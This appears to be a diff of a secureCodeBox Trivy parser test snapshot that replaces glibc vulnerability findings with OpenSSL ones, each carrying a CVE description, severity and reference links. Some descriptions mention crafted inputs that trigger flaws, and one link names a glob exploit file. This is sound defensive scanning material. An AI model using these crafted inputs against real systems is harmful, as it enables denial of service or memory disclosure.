"https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://security.netapp.com/advisory/ntap-20230427-0009/", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming +ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the +SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by +end user applications. + +The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter +BIO onto the front of it to form a BIO chain, and then returns the new head of +the BIO chain to the caller. Under certain conditions, for example if a CMS +recipient public key is invalid, the new filter BIO is freed and the function +returns a NULL result indicating a failure. However, in this case, the BIO chain +is not properly cleaned up and the BIO passed by the caller still retains +internal pointers to the previously freed filter BIO. If the caller then goes on +to call BIO_pop() on the BIO then a use-after-free will occur. This will most +likely result in a crash. + + + +This scenario occurs directly in the internal function B64_write_ASN1() which +may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on +the BIO. This internal function is in turn called by the public API functions +PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, +SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. + +Other public API functions that may be impacted by this include +i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and +i2d_PKCS7_bio_stream. + +The OpenSSL cms and smime command line applications are similarly affected. + + + +" +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "use-after-free following BIO_new_NDEF", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2023-0215", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://access.redhat.com/security/cve/CVE-2023-0215", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-10029", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", - "https://access.redhat.com/security/cve/CVE-2020-10029", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", - "https://linux.oracle.com/cve/CVE-2020-10029.html", - "https://linux.oracle.com/errata/ELSA-2021-0348.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200327-0003/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-10029", - ], - }, - "category": "Vulnerability", - "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-10029", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-10029", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-27618", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-27618", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", - "https://linux.oracle.com/cve/CVE-2020-27618.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210401-0006/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2020-27618", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - ], - }, - "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-27618", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-27618", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", + "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5845-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5845-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0286", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0286", + "https://access.redhat.com/security/cve/cve-2023-0286", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "https://linux.oracle.com/cve/CVE-2023-0286.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "name": "X.400 address type confusion in X.509 GeneralName", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", + "value": "https://avd.aquasec.com/nvd/cve-2023-0286", }, { "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "https://access.redhat.com/security/cve/CVE-2023-0286", }, { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "https://access.redhat.com/security/cve/cve-2023-0286", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://bugzilla.redhat.com/2164494", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", - ], - }, - "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: stack guard protection bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - 